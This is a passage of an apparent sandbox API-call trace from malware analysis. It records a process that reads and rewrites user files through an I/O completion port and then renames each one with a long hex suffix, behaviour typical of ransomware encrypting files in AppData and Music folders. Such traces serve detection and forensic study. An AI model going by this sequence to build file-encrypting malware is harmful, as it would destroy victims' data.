lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.944] RtlInterlockedCompareExchange64 () returned 0x1 [0164.944] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.947] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x2200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.948] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.949] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.950] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3", lpString2=".0E45E31918F226F3EDF19A8E05901AF07C08E135E34B2A35F1FAAB1468B38F1A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3.0E45E31918F226F3EDF19A8E05901AF07C08E135E34B2A35F1FAAB1468B38F1A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3.0E45E31918F226F3EDF19A8E05901AF07C08E135E34B2A35F1FAAB1468B38F1A" [0164.950] GetProcessHeap () returned 0x270000 [0164.950] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x116) returned 0x42762d8 [0164.950] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x42762d8, Length=0x116, FileInformationClass=0xa) returned 0x0 [0164.952] CloseHandle (hObject=0x598) returned 1 [0164.957] GetProcessHeap () returned 0x270000 [0164.959] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.959] RtlInterlockedCompareExchange64 () returned 0x1 [0164.959] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.963] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x5200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.963] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.966] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.967] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi", lpString2=".27BCC0055D90C9FCB86794D535F3916B27B9115E75F22005CB1D3EA9FA55C279" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi.27BCC0055D90C9FCB86794D535F3916B27B9115E75F22005CB1D3EA9FA55C279") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi.27BCC0055D90C9FCB86794D535F3916B27B9115E75F22005CB1D3EA9FA55C279" [0164.967] GetProcessHeap () returned 0x270000 [0164.967] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x4276400 [0164.967] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x4276400, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0164.973] CloseHandle (hObject=0x598) returned 1 [0164.976] GetProcessHeap () returned 0x270000 [0164.978] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.978] RtlInterlockedCompareExchange64 () returned 0x1 [0164.978] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.983] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.983] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.985] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0164.986] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv", lpString2=".66BE4B6D06DB210EE992C7ADC3EDEDA5BB39811410B8DB5E58C2C1B3F50E5E0C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv.66BE4B6D06DB210EE992C7ADC3EDEDA5BB39811410B8DB5E58C2C1B3F50E5E0C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv.66BE4B6D06DB210EE992C7ADC3EDEDA5BB39811410B8DB5E58C2C1B3F50E5E0C" [0164.986] GetProcessHeap () returned 0x270000 [0164.986] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x425e2a8 [0164.986] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x425e2a8, Length=0x122, FileInformationClass=0xa) returned 0x0 [0164.988] CloseHandle (hObject=0x598) returned 1 [0164.993] GetProcessHeap () returned 0x270000 [0164.995] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.995] RtlInterlockedCompareExchange64 () returned 0x1 [0164.995] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.998] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x4800, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0164.999] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.000] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0165.001] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf", lpString2=".9F3FC7B0039AB0271A8208F31AC4ECC3E2AC19ECBC95F8E192EAEB3A70C5540D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf.9F3FC7B0039AB0271A8208F31AC4ECC3E2AC19ECBC95F8E192EAEB3A70C5540D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf.9F3FC7B0039AB0271A8208F31AC4ECC3E2AC19ECBC95F8E192EAEB3A70C5540D" [0165.001] GetProcessHeap () returned 0x270000 [0165.001] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x130) returned 0x741c1d0 [0165.002] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x741c1d0, Length=0x130, FileInformationClass=0xa) returned 0x0 [0165.004] CloseHandle (hObject=0x598) returned 1 [0165.007] GetProcessHeap () returned 0x270000 [0165.008] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.008] RtlInterlockedCompareExchange64 () returned 0x1 [0165.008] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.013] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x4600, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0165.013] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.015] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0165.017] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png", lpString2=".E29D27863BBF8AA79B1ABB87FA56098938ECE859DF032C7FBFD8F1DB2AD25546" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png.E29D27863BBF8AA79B1ABB87FA56098938ECE859DF032C7FBFD8F1DB2AD25546") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png.E29D27863BBF8AA79B1ABB87FA56098938ECE859DF032C7FBFD8F1DB2AD25546" [0165.017] GetProcessHeap () returned 0x270000 [0165.017] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x4276528 [0165.017] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x4276528, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0165.019] CloseHandle (hObject=0x598) returned 1 [0165.023] GetProcessHeap () returned 0x270000 [0165.024] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.024] RtlInterlockedCompareExchange64 () returned 0x1 [0165.024] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.041] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x5800, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0165.041] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.045] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0165.046] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png", lpString2=".13AA4480DFA8DBE0EA40B9D57611F0F3FF0737D7B87F8E999AE00FC8E66C5A45" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png.13AA4480DFA8DBE0EA40B9D57611F0F3FF0737D7B87F8E999AE00FC8E66C5A45") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png.13AA4480DFA8DBE0EA40B9D57611F0F3FF0737D7B87F8E999AE00FC8E66C5A45" [0165.046] GetProcessHeap () returned 0x270000 [0165.046] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12e) returned 0x741c308 [0165.046] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x741c308, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0165.049] CloseHandle (hObject=0x598) returned 1 [0165.053] GetProcessHeap () returned 0x270000 [0165.055] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.057] RtlInterlockedCompareExchange64 () returned 0x1 [0165.058] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.117] ReadFile (in: hFile=0x58c, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0165.117] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.118] WriteFile (in: hFile=0x58c, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0165.120] RtlInterlockedCompareExchange64 () returned 0x0 [0165.120] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.121] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x73e00f8, ReturnLength=0x72aff5c) returned 0x0 [0165.123] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx", lpString2=".DAAC0F8F5494E94477596CEAF48BC59411F096E88D50EA90D5F5C7E372D80041" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.DAAC0F8F5494E94477596CEAF48BC59411F096E88D50EA90D5F5C7E372D80041") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.DAAC0F8F5494E94477596CEAF48BC59411F096E88D50EA90D5F5C7E372D80041" [0165.123] GetProcessHeap () returned 0x270000 [0165.123] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x196) returned 0x432e458 [0165.123] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x72aff4c, FileInformation=0x432e458, Length=0x196, FileInformationClass=0xa) returned 0x0 [0165.125] CloseHandle (hObject=0x58c) returned 1 [0165.225] GetProcessHeap () returned 0x270000 [0165.227] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.227] RtlInterlockedCompareExchange64 () returned 0x1 [0165.227] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.413] ReadFile (in: hFile=0x304, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0165.416] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.720] ReadFile (in: hFile=0x5b8, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0165.732] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.794] WriteFile (in: hFile=0x5b8, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0165.824] RtlInterlockedCompareExchange64 () returned 0x1 [0165.824] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.952] WriteFile (in: hFile=0x5a4, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0165.954] RtlInterlockedCompareExchange64 () returned 0x2 [0165.954] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.694] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x744a270, ReturnLength=0x72aff5c) returned 0x0 [0167.695] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\nFrHcwd2OR.m4a", lpString2=".043DDCDFB124973C275B67E94C9E51C41E1EFB97B44A4512BE4D87843BD79603" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\nFrHcwd2OR.m4a.043DDCDFB124973C275B67E94C9E51C41E1EFB97B44A4512BE4D87843BD79603") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\nFrHcwd2OR.m4a.043DDCDFB124973C275B67E94C9E51C41E1EFB97B44A4512BE4D87843BD79603" [0167.695] GetProcessHeap () returned 0x270000 [0167.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x741e048 [0167.695] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x72aff4c, FileInformation=0x741e048, Length=0x126, FileInformationClass=0xa) returned 0x0 [0167.697] CloseHandle (hObject=0x5a4) returned 1 [0167.698] GetProcessHeap () returned 0x270000 [0167.699] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0167.699] RtlInterlockedCompareExchange64 () returned 0x1 [0167.699] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.702] ReadFile (in: hFile=0x5a4, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0167.702] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.709] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x744a270, ReturnLength=0x72aff5c) returned 0x0 [0167.710] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav", lpString2=".844142698AEC9CBE2D67AF1F793528A2601EF12E4214FFC7C9DF6DE296B77226" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav.844142698AEC9CBE2D67AF1F793528A2601EF12E4214FFC7C9DF6DE296B77226") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav.844142698AEC9CBE2D67AF1F793528A2601EF12E4214FFC7C9DF6DE296B77226" [0167.710] GetProcessHeap () returned 0x270000 [0167.710] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x4331f60 [0167.711] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x72aff4c, FileInformation=0x4331f60, Length=0x128, FileInformationClass=0xa) returned 0x0 [0167.712] CloseHandle (hObject=0x5a4) returned 1 [0167.713] GetProcessHeap () returned 0x270000 [0167.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0167.715] RtlInterlockedCompareExchange64 () returned 0x1 [0167.715] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.723] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.724] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.724] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.726] RtlInterlockedCompareExchange64 () returned 0x0 [0167.726] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.736] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x7e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.737] RtlInterlockedCompareExchange64 () returned 0x0 [0167.737] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.748] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x5c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.749] RtlInterlockedCompareExchange64 () returned 0x0 [0167.749] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.758] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.759] RtlInterlockedCompareExchange64 () returned 0x0 [0167.759] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.767] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.769] RtlInterlockedCompareExchange64 () returned 0x0 [0167.769] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.785] WriteFile (in: hFile=0x5a4, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) 